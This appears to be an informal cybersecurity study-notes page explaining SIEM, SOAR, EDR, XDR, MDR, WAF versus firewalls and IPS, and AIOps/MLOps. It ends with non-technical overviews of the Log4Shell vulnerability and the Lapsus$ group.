XDR EDR SOAR and SIEM

Various topics related to Cybersecurity.

 

 

XDR vs EDR vs SOAR vs SIEM

Definitions on tools / services commonly used for cybersecurity.

SIEM

Combining security information management (SIM) and security event management (SEM), security information and event management (SIEM) offers real-time monitoring and analysis of events as well as tracking and logging of security data for compliance or auditing purposes.

SIEM is a security solution that helps organizations recognize potential security threats and vulnerabilities before they have a chance to disrupt business operations. It surfaces user behavior anomalies and uses artificial intelligence to automate many of the manual processes associated with threat detection and incident response and has become a staple in modern-day security operation centers (SOCs) for security and compliance management use cases.

SIEM solutions perform some level of data aggregation, consolidation and sorting functions in order to identify threats and adhere to data compliance requirements. While some solutions vary in capability, most offer the same core set of functionality:

  • Log Management
  • Event Correlation and Analytics
  • Incident Monitoring and Security Alerts
  • Compliance Management and Reporting

SIEM tools supports threat detection, compliance and security incident management through collection and analysis of security events and other contextual data sources. The system would be tracking events / incidents across the IT infrastructure.

 

SOAR

Security Orchestration, Automation and Response. This is the remediation or action that is automatically done in response to an incident tracked by a SIEM system. This is usually implemented or executed through playbooks. Security is the restriction of a system to its intended use and the protection of the confidentiality, integrity, and availability of that system. Orchestration is the automated configuration, coordination, and management of computer systems and software. Automation is the technology by which a process or procedure is performed with minimal human assistance. In cybersecurity, response is fairly complicated. We often call this “incident response” or “incident handling.”

Response

The situation is that we often don’t know if it is an actual incident at the start of our response, so we need initial validation and verification after we have been given a clue that we need to start our response. That initial clue is either in the form of an alert (derived from our SIEM or some other tool designed to notify) or a report, perhaps from a person, such as a customer or an employee noticing that something is not behaving according to expectations. Response, then, is our effort to perform initial verification, short-term mitigation, fundamental root-cause analysis, business continuity in the face of actual incidents, and long-term enhancement of our systems to be more resilient to issues.

SOAR technologies that enable organizations to collect inputs monitored by the security operations team. For example, alerts from the SIEM system.

Example of SOAR in AWS

Some AWS native services that help with your SOAR solution:

  • Identity and Access Management (IAM)
  • Artifact
  • Audit Manager
  • Config
  • CloudFront
  • CloudTrail
  • CloudWatch
  • Detective
  • Directory Service
  • Firewall Manager
  • Cloud Directory
  • GuardDuty
  • Inspector
  • Macie
  • Network Firewall
  • Resource Access Manager (AWS RAM)
  • Secrets Manager
  • Security Hub
  • Sheild
  • VPC Flow Logs
  • WAF

Logging is fundamental to enable data monitoring and tracking. An example workflow of activity to automate response – scenario = compromised EC2 instance or Lambda function

  1. Activate Standby / Pause Instance
  2. Snapshot
  3. Review
  4. Decide
  5. Remediate

Can deploy third party solutions like Sumo Logic. This solution provides:

  • Threat focus that leverages machine learning to reduce false positives and duplicate events
  • Orchestration that connects tools to fully automate incident response
  • Collaboration by automating incident lifecycle
  • Customizable reports and dashboards for visibility to KPIs

 

Endpoint Detection and Response

EDR is endpoint security solution that combines real-time continuous monitoring and collection of endpoint data with rules-based automated response and analysis.

There are two parts to EDR, proactive protection and reactive detection. Usually the EDR is working to minimize the Dwell Time, which the amount of time a threat has penetrated a network or system.

 

 

Extended Detection and Response

XDR is evolution of EDR with added capabilities like automated enrichment and root cause analysis, third party integrations, internal and external threat intel feed, and automated response. These are usually SAAS tools.

XDR solutions usually have more integrations between the different parts of the IT infrastructure. It is ingesting data from various IT solutions/products. Therefore it is able to see a ‘bigger picture’ where an incident is an event that might be tied to multiple parts of the infrastructure. This is different from a SIEM solution where incidents are being created at each individual parts of the infrastructure and therefore may not see the bigger picture that all those incidents are tied to the same attack.

Microsoft 365 Defender is an XDR solution that uses other Microsoft tools at the individual parts of the infrastructure but are all integrated with 365 Defender to provide the bigger picture. This can still be attached to a SIEM solution. The incidents this generates can then be tied to a SOAR solution which would automatically remediate the threat.

 

Managed Detection and Response

MDR is the service(s) that depends on the extended detection and response (XDR) logs/findings as well as the EDR software such that automated responses or acted (either through SOAR or playbooks). MDR also takes into account network analysis and visibility tools (NAV), network traffic analysis (NTA) and analysis of security log data.

 

 

WAF vs Firewall vs IPS

Webapp Firewall is used by web apps to shift through data and block certain traffic into the application. This is different than a traditional network firewall that is providing the block at the network layer before even getting to the WAF.

WAF generally focus on threats aimed at HTTP/HTTPS (Layer 7) whereas traditional firewalls view all protocols at the Layer 3 (Network) and Layer 4 (Transport) on the OSI model. Being at the lower layers the network firewalls are able to do things like proxy inspection and packet filtering.

Both WAFS and network firewalls are able to protect against DDOS attacks, but at the different network layers. WAF also protects against the OWASP top threat list.

Intrusion Prevention System (IPS) uses signatures to determine what to block. This is usually done by checking against a dataset of either block / allow signatures.

Unlike IPS the WAF doesnt look at signatures of the request but the user, session or application the request is accessing.

 

AIOps and MLOps

Artificial Intelligence for IT Operations (AIOps) is a term coined by Gartner in 2016 as an industry category for machine learning analytics technology that enhances IT operations analytics.[1] AIOps[2] is the acronym of “Algorithmic IT Operations“. Such operation tasks include automation, performance monitoring and event correlations among others.

There are two main aspects of an AIOps platform: machine learning and big data. In order to collect observational data and engagement data that can be found inside a big data platform and requires a shift away from sectionally segregated IT data, a holistic machine learning and analytics strategy is implemented against the combined IT data. The goal is to enable IT transformation,[9] receive continuous insights which provide continuous fixes and improvements via automation. This is why AIOps can be viewed as CI/CD for core IT functions.

The normalized data is suitable to be processed through machine learning algorithms to automatically reduce noise and identify the probable root cause of incidents. The main output of such stage is the detection of any abnormal behavior from users, devices or applications.

Noise reduction can be done by various methods, but most of the researches in the field points to the following actions:

  1. Analysis of all incoming alerts;
  2. Remove duplicates;
  3. Identify the false positives;
  4. Early anomaly, fault and failure (AFF) detection and analysis.

Anomaly detection – another step in any AIOps process is based on the analysis of past behavior of users, equipment and applications. Anything that strays from that behavior baseline is considered unusual and flagged as abnormal. Root cause determination is done usually by passing incoming alerts through algorithms that takes into consideration correlated events as well as topology dependencies. The algorithms on which AI are basing their functioning can be influenced directly, essentially by “training” them.

 

MLOps or ML Ops is a set of practices that aims to deploy and maintain machine learning models in production reliably and efficiently. The word is a compound of “machine learning” and the continuous development practice of DevOps in the software field. Machine learning models are tested and developed in isolated experimental systems. When an algorithm is ready to be launched, MLOps is practiced between Data Scientists, DevOps, and Machine Learning engineers to transition the algorithm to production systems. Similar to DevOps or DataOps approaches, MLOps seeks to increase automation and improve the quality of production models, while also focusing on business and regulatory requirements. While MLOps started as a set of best practices, it is slowly evolving into an independent approach to ML lifecycle management. MLOps applies to the entire lifecycle – from integrating with model generation (software development lifecyclecontinuous integration/continuous delivery), orchestration, and deployment, to health, diagnostics, governance, and business metrics. According to Gartner, MLOps is a subset of ModelOps. MLOps is focused on the operationalization of ML models, while ModelOps covers the operationalization of all types of AI models.

 

 

 

Log4j Exploit

zero-day vulnerability involving remote code execution in Log4j 2, given the descriptor “Log4Shell” (CVE-2021-44228), was found and reported to Apache by Alibaba on November 24, 2021, and published in a tweet on December 9, 2021.[11] Affected services include CloudflareiCloudMinecraft: Java Edition,[41] SteamTencent QQ, and Twitter.[42][43][44] The Apache Software Foundation assigned the maximum CVSS severity rating of 10 to Log4Shell, as millions of servers could be potentially vulnerable to the exploit. The vulnerability was characterized by cybersecurity firm Tenable as “the single biggest, most critical vulnerability of the last decade” and Lunasec’s Free Wortley characterized it as “a design failure of catastrophic proportions”.

The Log4shell Zero-day vulnerability (CVE-2021-44228) was published on 10.12.2021.[1] This vulnerability affects the popular Log4j logging library for Java applications. An IT security service provider reports this vulnerability in log4j, which may allow attackers to execute their own program code on the target system and thus compromise the server.

Hackers are scanning through the internet to find vulnerable servers and setting up machines that can deliver malicious payloads. To carry out an attack, they query services (for example, web servers) and try to trigger a log message (for example, a 404 error). The query includes maliciously crafted text, which Log4j processes as instructions.

These instructions can create a reverse shell, which allows the attacking server to remotely control the targeted server, or they can make the target server part of a botnet. Botnets use multiple hijacked computers to carry out coordinated actions on behalf of the hackers.

 

LAPSUS$

Ransomware made by the Lapsus$ Group. Multiple attacks worldwide.

On March 21, 2022, individuals from a group identifying themselves as Lapsus$ posted on a social media platform and alleged to have stolen source code from a number of United States-based technology companies. These unidentified individuals took credit for both the theft and dissemination of proprietary data that they claim to have illegally obtained. The FBI is seeking information regarding the identities of the individuals responsible for these cyber intrusions.

https://www.fbi.gov/wanted/seeking-info/lapsus

 

 

References

https://en.wikipedia.org/wiki/Security_information_and_event_management

https://www.youtube.com/c/TheCISOPerspective

https://www.youtube.com/channel/UCtVHX3fmQVjVgj_cGRIxRSg